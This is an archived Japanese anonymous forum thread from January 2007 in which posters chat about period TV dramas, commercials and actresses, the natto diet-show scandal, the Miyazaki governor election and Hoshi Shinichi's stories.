456 :おいら名無しさん(´ー`)ノ :2007/01/16(火) 21:06:43 ID:???
外人のオバちゃんです

457 :おいら名無しさん(´ー`)ノ :2007/01/16(火) 21:07:29 ID:???
剣客商売はですね、そうとうおもしろいはずです

458 :花粉ちゃん:2007/01/16(火) 21:54:09 ID:???
ジャネット・リンですね。
私のこどものころはものすごい人気でしたよ。
カルピスのCMにも出てました。

459 :花粉ちゃん:2007/01/16(火) 22:28:57 ID:???
一般的なテレビ時代劇は現代劇の刑事モノや探偵モノの時代を
過去にずらしただけで結局殺人事件がストーリーの中心なんですが
剣客商売の場合は侍の価値観が主たるテーマであって、何も事件が
起こらないエピソードがけっこうあります。そういうところが好きです。
原作は一冊だけ持ってます。

460 :おいら名無しさん(´ー`)ノ :2007/01/17(水) 19:51:42 ID:???
原作は30歳とか40歳とかの節目の年に読み直す予定です。
話の筋はしっかりと忘れ低ルはずです

461 :花粉ちゃん:2007/01/17(水) 21:49:33 ID:???
だいたひかるも!

462 :花粉ちゃん:2007/01/17(水) 22:38:00 ID:???
市川さんの鼻かわいいですね。

463 :花粉ちゃん:2007/01/18(木) 13:49:10 ID:???
> デビューから7周年を迎えたdreamが、その7年間の記録を
> 凝縮したベスト・アルバム『7th Anniversary Best』をリリースした。

464 :おいら名無しさん(´ー`)ノ :2007/01/18(木) 19:23:57 ID:???
だいたさんのも戸だんなに影響を受けた世代のちょっと下です

465 :おいら名無しさんヽ(´ー`)ノ:2007/01/18(木) 20:29:41 ID:???
dreamといえば麻未ちゃんです。

466 :花粉ちゃん:2007/01/18(木) 20:38:00 ID:???
いえ美人じゃないけど個性派の佳奈ちゃんです。

467 :花粉ちゃん:2007/01/18(木) 22:37:12 ID:???
市川さんの鼻かわいいですね。

468 :花粉ちゃん:2007/01/19(金) 12:37:49 ID:???
新生銀行から届きました。

469 :おいら名無しさん(´ー`)ノ :2007/01/20(土) 00:02:04 ID:???
赤ちゃん!?

470 :花粉ちゃん:2007/01/20(土) 19:20:49 ID:???
ああこれで今後は通販で買って無料で振り込みできる。
うれしい。

471 :花粉ちゃん:2007/01/20(土) 21:02:35 ID:???
新美味しんぼ見てますが、開始2分ですでにダメダメな雰囲気です。

472 :花粉ちゃん:2007/01/20(土) 21:09:07 ID:???
唐沢版と非唐沢版

473 :花粉ちゃん:2007/01/20(土) 21:11:05 ID:???
優香はシャッキリポンのイメージにぴったりです。
かわいい。

474 :花粉ちゃん:2007/01/20(土) 22:16:58 ID:???
掃除してたらクオカードが2,000円ぶん出てきたので
セブンイレブンでレッドブル買ってこようと思います。

475 :おいら名無しさん(´ー`)ノ :2007/01/20(土) 23:32:10 ID:???
sebunnirebunは早くクレジットカード使えるように

476 :花粉ちゃん:2007/01/21(日) 00:00:04 ID:???
もうすぐナナコが使えるようになりますよ!

477 :花粉ちゃん:2007/01/21(日) 00:21:14 ID:???
今から 『華麗なる一族』 映画版を見ます。

478 :おいら名無しさんヽ(´ー`)ノ:2007/01/21(日) 07:19:23 ID:???
納豆が!

479 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 11:42:15 ID:???
各地の零細納豆下請けが気の毒なことになりますか?

480 :花粉ちゃん:2007/01/21(日) 12:20:41 ID:???
納豆自殺

481 :花粉ちゃん:2007/01/21(日) 12:23:47 ID:???
44年の人生で納豆は1.5粒くらいしか食べたことがありません。
甘納豆は35歳過ぎてから渋い緑茶と一緒なら食べれるようになりました。

482 :花粉ちゃん:2007/01/21(日) 12:28:23 ID:???
最近の『あるある』の暴走ぶりには辟易していたので痛快であります。
そもそも放送開始当初の『あるある』は健康増進がテーマじゃなくて
視聴者から寄せられた日常生活で出くわす小さな疑問を解明する
趣旨の番組でしたよねぇ?

483 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 12:31:28 ID:???
JALのCM可愛いです

484 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 12:32:26 ID:???
記憶にないですね

485 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 12:34:05 ID:???
香取さんを外してアイブさんを主役に使って欲しい

486 :花粉ちゃん:2007/01/21(日) 12:42:03 ID:???
JALのアイブさんの新作かわいいです。
ガッキーのポッキーCMもかわいいですが
かわいい女性が踊るとさらにかわいくなるのですね。
次はフッキーに踊ってほしい。

487 :花粉ちゃん:2007/01/21(日) 12:43:19 ID:???
ミスドのCMのころはアイブさんが妙に不細工に見えることがあったんですが
最近はどのCMでも安定してかわいいです。
さすが宝塚一家。

488 :花粉ちゃん:2007/01/21(日) 12:44:08 ID:???
ガッキーポッキーフッキー

489 :花粉ちゃん:2007/01/21(日) 12:49:31 ID:???
菊間落下アナが視聴者からのハガキを読んで、会場のお客さんが
(いいともみたいに)声をそろえて「あるある!」と叫ぶ光景を憶えてます。

490 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 20:05:55 ID:???
当確が出たようですが、知事職はよくやろうとすると
非常に難しく、議会や社員と軋轢なくやっていかないと
停滞しますので、そうするとまったく目立たなくなります

多分そのコースになると思います

491 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 20:07:36 ID:???
あと経世済民を語らせて新知事に対抗できる国会議員は10%いない可能性が高い

492 :花粉ちゃん:2007/01/21(日) 20:23:41 ID:???
そのまんま知事

493 :花粉ちゃん:2007/01/21(日) 20:26:18 ID:???
勘違いしたマスコミが馬鹿な質問をしませんように・・

494 :花粉ちゃん:2007/01/21(日) 20:27:35 ID:???
円楽!?

495 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 20:29:05 ID:???
正月のえんらくを見ていないのでs


496 :花粉ちゃん:2007/01/21(日) 20:35:09 ID:???
レッドブル効きますわー。
ものごっつ元気でますわー。

497 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 20:45:43 ID:???
ttp://www.uploda.org/uporg662263.jpg

498 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 20:59:19 ID:???
参院選が荒れそうす

499 :花粉ちゃん:2007/01/21(日) 21:20:03 ID:???
ユニも!

500 :花粉ちゃん:2007/01/21(日) 21:20:36 ID:???
みんな死ぬ! 死んでいく!

501 :おいら名無しさん(´ー`)ノ :2007/01/21(日) 22:17:31 ID:???
死にますね

502 :花粉ちゃん:2007/01/22(月) 14:07:17 ID:???
何度も言いますが私はかとうかず子氏のファンです。

503 :花粉ちゃん:2007/01/22(月) 15:33:03 ID:???
フッキーの新作映画見に行きたいんですけど
カーリング+韓流ってあまりにも安易すぎます。

504 :花粉ちゃん:2007/01/22(月) 17:56:29 ID:???
宮崎出身の陛下がSNMM東知事にインタビュー!

505 :花粉ちゃん:2007/01/22(月) 18:16:44 ID:???
大神源太に18年求刑!

506 :おいら名無しさんヽ(´ー`)ノ:2007/01/22(月) 18:53:58 ID:???
nico.necoが欲しいです。
ベネトンも欲しいです。
でも高いんでしょうね・・・・・・・・

507 :おいら名無しさん(´ー`)ノ :2007/01/22(月) 19:32:58 ID:???
18年・・・

508 :花粉ちゃん:2007/01/22(月) 19:36:25 ID:???
nico.necoのネコはあの位置にくっついてるんですか?

509 :おいら名無しさんヽ(´ー`)ノ:2007/01/22(月) 19:42:42 ID:???
どうやら、あの位置にくっついているみたいです。

510 :花粉ちゃん:2007/01/22(月) 19:46:52 ID:???
ネコ大好きです。
ほんとは飼いたい。

511 :ミギ:2007/01/23(火) 06:08:26 ID:???
高木広子さんがNYに…

512 :花粉ちゃん:2007/01/23(火) 09:57:21 ID:???
えぇぇ!

513 :花粉ちゃん:2007/01/23(火) 11:31:26 ID:???
高木さんは子供さんも連れて行ってるんでしょうね?

514 :花粉ちゃん:2007/01/23(火) 11:33:12 ID:???
東国原知事に花束を手渡す役の県職員が松尾に似てかわいかったです。

515 :花粉ちゃん:2007/01/23(火) 19:07:15 ID:???
マツケンの金さんがツマラナイデス!

516 :おいら名無しさん(´ー`)ノ :2007/01/23(火) 19:38:34 ID:???
風呂で星新一を呼んでいるんですが、
一冊のうち数編、鳥肌が立つようなものがあります。
10年前に一度読んだものですが、最初に書かれたのは、40年前とかのものです

517 :おいら名無しさん(´ー`)ノ :2007/01/23(火) 19:39:07 ID:???
池波正太郎の短編も平気でそれくらいさかのぼるので、
読めて幸せです

518 :花粉ちゃん:2007/01/23(火) 20:03:51 ID:???
金さんがつまらなかったので剣客商売を見ます。

519 :花粉ちゃん:2007/01/23(火) 20:04:35 ID:???
ボッコちゃん

520 :おいら名無しさん(´ー`)ノ :2007/01/23(火) 20:12:08 ID:???
最近私の中の作家ベスト3のうち二人は揺らいできているのでウsが
星新一は揺るがないです

521 :花粉ちゃん:2007/01/23(火) 20:19:17 ID:???
プレレント用にコレを4個買いました!
http://www.amazon.co.jp/gp/product/B0009XJZGI/ref=pd_cpt_gw_1/249-4329582-9529967
なつかしい!
私が小学生のころに大ブームになった貯金箱です!

522 :花粉ちゃん:2007/01/23(火) 20:23:18 ID:???
まちがえた。
http://www.amazon.co.jp/gp/product/images/B0007U936A/ref=dp_image_text_0/249-4329582-9529967?ie=UTF8&n=13299531&s=toys
こっちです。
どっちでもいいです。

523 :花粉ちゃん:2007/01/23(火) 20:24:52 ID:???
星新一の後継者はいませんか。

524 :ミギ:2007/01/23(火) 20:42:25 ID:???
無理でしょう

525 :花粉ちゃん:2007/01/23(火) 22:26:22 ID:???
ミギさんってどのくらい右翼なんですか?

526 :おいら名無しさん(´ー`)ノ :2007/01/24(水) 04:34:03 ID:???
http://www.the-miyanichi.co.jp/domestic/index.php?typekbn=1&top_press_no=200701230111
これですね

527 :花粉ちゃん:2007/01/24(水) 13:00:54 ID:???
子授け屋祐ちゃん
http://www.threeweb.ad.jp/~excelle/pro.html

528 :花粉ちゃん:2007/01/24(水) 13:04:54 ID:???
祐ちゃんが6〜7年前にインタビューを受けてる映像を
見ましたが普通の気弱なオタク青年っぽい風貌でした。
その後いったい何があったのか。

529 :花粉ちゃん:2007/01/24(水) 13:06:04 ID:???
>>526
この人です。テレビで動いてるところを見ましたが
松尾由美子を丸顔にした感じで非常にかわいかったです。

530 :おいら名無しさん(´ー`)ノ :2007/01/24(水) 20:02:45 ID:???
aa


531 :おいら名無しさん(´ー`)ノ :2007/01/24(水) 20:23:12 ID:???
http://journal.mycom.co.jp/news/2007/01/22/500.html

なんか違うような・・

532 :おいら名無しさんヽ(´ー`)ノ:2007/01/24(水) 20:29:26 ID:???
微妙ですね。

533 :花粉ちゃん:2007/01/24(水) 22:34:15 ID:???
カップが丈夫なら買ってもいいかも。

63 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)